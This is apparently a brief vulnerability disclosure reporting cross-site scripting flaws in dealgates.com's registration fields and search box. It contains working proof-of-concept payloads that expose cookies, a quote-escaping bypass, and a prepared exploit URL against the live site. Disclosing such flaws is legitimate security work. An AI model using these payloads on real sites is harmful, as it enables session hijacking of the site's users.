Dealgates.com

Homepage:

http://www.dealgates.com

Affected files:

*Input boxes when registering new account

* Search box

-------------------------------------

XSS vuln with cookie disclosure when registering a new account.

To bypass the adding backslashes to ; and ", we use the long UTF-8 unicode of '. PoC:

In the input boxes of "Your name:" and "Address".

<IMG SRC=javascript:alert('XSS')>

For the cookie:

<IMG SRC=javascript:alert(document.cookie)>

-----------------------------------

XSS vuln with cookie disclosure via search input box. For a PoC put:

">">">">">'>'>">"><<IMG SRC=javascript:alert(document.cookie)><"<"<"<"<'<'<"<"

URL:

https://www.dealgates.com/search.php?dealquery=%22%3E%22%3E%22%3E%22%3E%
22%3E%27%3E%27%3E%22%3E%3CIMG+SRC%3Djavascript%3Aalert%28document.cookie
%29%3E%3C%22%3C%27%3C%27%3C%27%3C%27%3C%27%3C%22&search_type=2

Screenshots:

http://www.youfucktard.com/xsp/dealgates1.jpg

http://www.youfucktard.com/xsp/dealgates2.jpg

http://www.youfucktard.com/xsp/dealgates3.jpg

[ reply ]